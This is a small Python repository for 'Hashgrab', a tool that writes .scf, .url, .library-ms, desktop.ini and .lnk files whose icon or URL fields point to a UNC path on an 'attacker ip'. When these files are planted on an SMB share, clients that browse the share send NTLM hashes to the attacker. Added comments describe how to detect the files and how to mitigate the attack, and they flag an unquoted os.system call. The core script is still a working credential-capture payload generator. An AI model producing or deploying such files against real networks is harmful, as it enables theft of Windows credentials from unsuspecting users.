├── requirements.txt ├── README.md ├── .gitignore └── hashgrab.py /requirements.txt: -------------------------------------------------------------------------------- 1 | pylnk3 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hashgrab 2 | 3 | Generates scf, url & lnk payloads to put onto a smb share. These force authentication to an attacker machine in order to grab hashes (for example with responder). 4 | 5 | Usage: 6 | 7 | ```bash 8 | python3 hashgrab.py 9 | ``` -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | share/python-wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | MANIFEST 28 | 29 | # PyInstaller 30 | # Usually these files are written by a python script from a template 31 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
32 | *.manifest 33 | *.spec 34 | 35 | # Installer logs 36 | pip-log.txt 37 | pip-delete-this-directory.txt 38 | 39 | # Unit test / coverage reports 40 | htmlcov/ 41 | .tox/ 42 | .nox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *.cover 49 | *.py,cover 50 | .hypothesis/ 51 | .pytest_cache/ 52 | cover/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | .pybuilder/ 76 | target/ 77 | 78 | # Jupyter Notebook 79 | .ipynb_checkpoints 80 | 81 | # IPython 82 | profile_default/ 83 | ipython_config.py 84 | 85 | # pyenv 86 | # For a library or package, you might want to ignore these files since the code is 87 | # intended to run in multiple environments; otherwise, check them in: 88 | # .python-version 89 | 90 | # pipenv 91 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 92 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 93 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 94 | # install all needed dependencies. 95 | #Pipfile.lock 96 | 97 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow 98 | __pypackages__/ 99 | 100 | # Celery stuff 101 | celerybeat-schedule 102 | celerybeat.pid 103 | 104 | # SageMath parsed files 105 | *.sage.py 106 | 107 | # Environments 108 | .env 109 | .venv 110 | env/ 111 | venv/ 112 | ENV/ 113 | env.bak/ 114 | venv.bak/ 115 | 116 | # Spyder project settings 117 | .spyderproject 118 | .spyproject 119 | 120 | # Rope project settings 121 | .ropeproject 122 | 123 | # mkdocs documentation 124 | /site 125 | 126 | # mypy 127 | .mypy_cache/ 128 | .dmypy.json 129 | dmypy.json 130 | 131 | # Pyre type checker 132 | .pyre/ 133 | 134 | # pytype static type analyzer 135 | .pytype/ 136 | 137 | # Cython debug symbols 138 | cython_debug/ 139 | 140 | *.lnk 141 | *.scf 142 | *.url -------------------------------------------------------------------------------- /hashgrab.py: --------------------------------------------------------------------------------
# hashgrab.py
#
# Per the project README, this script writes shortcut-style files (.scf, .url,
# .lnk; the code also writes .library-ms and desktop.ini) meant to be placed on
# an SMB share, where they make clients authenticate to the host given as `ip`.
# Every template below does this the same way: an icon, URL or path field is
# set to a location on that host (\\<ip>\x\<name>).
#
# Defensive reading: the artifact to look for is a file of one of these types
# whose icon/URL/path field names a UNC path on a host outside the
# organisation. Blocking outbound SMB at the network edge and restricting
# outgoing NTLM authentication are the usual mitigations.
import argparse
import random
import os
from time import sleep
from pylnk3 import Lnk

# .scf template: IconFile is a UNC path; generate() fills in host and icon name.
scf = '''
[Shell]
Command=2
IconFile=\\\\{}\\x\\{}.ico
[Taskbar]
Command=ToggleDesktop
'''

# .url (InternetShortcut) template: an http URL and a UNC IconFile, both on the
# same host; four fields in total (host, name, host, name).
url = '''
[InternetShortcut]
URL=http://{}/x/{}.html
IconIndex=1
IconFile=\\\\{}\\x\\{}.ico
'''

# .library-ms template.
# NOTE(review): the element markup appears to have been stripped from this
# listing, leaving only text values and blank lines, so this literal is
# probably not the file's original content. Confirm against the repository.
# "<§" / "§>" are stand-ins that generate() turns into "{" / "}" after
# str.format has run, so the braces around the GUID are not read as fields.
lib = '''


@windows.storage.dll,-34582
6
true
imageres.dll,-1003

<§7d49d726-3c21-4f05-99aa-fdc2c9474656§>



true
false

\\\\{}\\x\\{}




'''

# desktop.ini template: IconResource is a UNC path; three fields in total.
ini = '''
[.ShellClassInfo]
IconResource=\\\\{}\\x\\{}
IconIndex={}
'''


def generate(ip: str, out: str) -> None:
    """Write five shortcut-style files that reference a remote path on ``ip``.

    The files are ``@<out>.scf``, ``@<out>.url``, ``<out>.library-ms``,
    ``desktop.ini`` and ``<out>.lnk``. Names are opened exactly as built, so
    they land relative to the current working directory, and an existing
    ``desktop.ini`` there is truncated and overwritten (mode ``'w+'``).

    Args:
        ip: Host written into every UNC/URL reference. It is used as given;
            this function performs no validation or escaping.
        out: Base name for the generated files (``desktop.ini`` ignores it).

    Side effects: prints progress to stdout, runs the ``pylnk3`` command line
    through ``os.system``, and sleeps for one second.
    """
    print("[*] Generating hash grabbing files..")
    # .scf: host plus a resource name with a random 0-1000 suffix.
    scf_payload = scf.format(ip, f"scf_{random.randint(0, 1000)}")
    fname = f'@{out}.scf'
    with open(fname, 'w+') as f:
        f.write(scf_payload)
    print(f"[*] Written {fname}")

    # .url: the two random suffixes are drawn independently, so the URL name
    # and the icon name normally differ.
    url_payload = url.format(ip, f"url_{random.randint(0, 1000)}", ip, f"url_{random.randint(0, 1000)}")
    fname = f'@{out}.url'
    with open(fname, 'w+') as f:
        f.write(url_payload)
    print(f"[*] Written {fname}")

    # .library-ms: str.format ignores positional arguments beyond the
    # template's fields. The "<§"/"§>" stand-ins become literal braces only
    # after formatting.
    lib_payload = lib.format(ip, f"library-ms_{random.randint(0, 1000)}", ip, f"library-ms_{random.randint(0, 1000)}")
    lib_payload = lib_payload.replace("<§","{").replace("§>","}")
    fname = f'{out}.library-ms'
    with open(fname, 'w+') as f:
        f.write(lib_payload)
    print(f"[*] Written {fname}")

    # desktop.ini: fixed file name, independent of `out`. The template has
    # three fields; str.format fills them from the first three arguments and
    # ignores the rest.
    ini_payload = ini.format(ip, f"ini_{random.randint(0, 1000)}", ip, f"ini_{random.randint(0, 1000)}", f"{random.randint(0, 1000)}")
    fname = f'desktop.ini'
    with open(fname, 'w+') as f:
        f.write(ini_payload)
    print(f"[*] Written {fname}")

    # .lnk: a skeleton link is created next to this script by shelling out to
    # the pylnk3 command line, then loaded and re-saved with its icon set.
    skeleton_path = f"{os.path.dirname(os.path.abspath(__file__))}/skel"
    fname =f"lnk_{random.randint(0, 1000)}.ico"
    # NOTE(review): `ip` and the script directory are interpolated into a shell
    # command line without quoting, so whitespace or shell metacharacters in
    # either change the command that runs. subprocess.run with an argument
    # list would avoid the shell entirely.
    path = f"pylnk3 c \\\\\\\\{ip}\\\\x\\\\{fname} {skeleton_path}.lnk"
    os.system(path)
    # os.system already blocks until the command exits; presumably this pause
    # is a safety margin. Confirm whether it is needed.
    sleep(1)
    lnk = Lnk(skeleton_path)
    lnk.icon = f'\\\\{ip}\\x\\{fname}'
    lnk.save(f'{out}.lnk')
    # `fname` still holds the icon name here, so this line reports the icon
    # name rather than the saved "<out>.lnk" path.
    print(f"[*] Written {fname}")
    print("[+] Done, upload files to smb share and capture hashes with smbserver.py/responder")


# Command-line entry point: two positional strings, passed to generate()
# unchanged (no validation of `ip` or `out`).
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='create hash grabbing payloads')
    parser.add_argument('ip', type=str, help='attacker ip')
    parser.add_argument('out', type=str, help='output name')
    args = parser.parse_args()
    generate(args.ip, args.out)

--------------------------------------------------------------------------------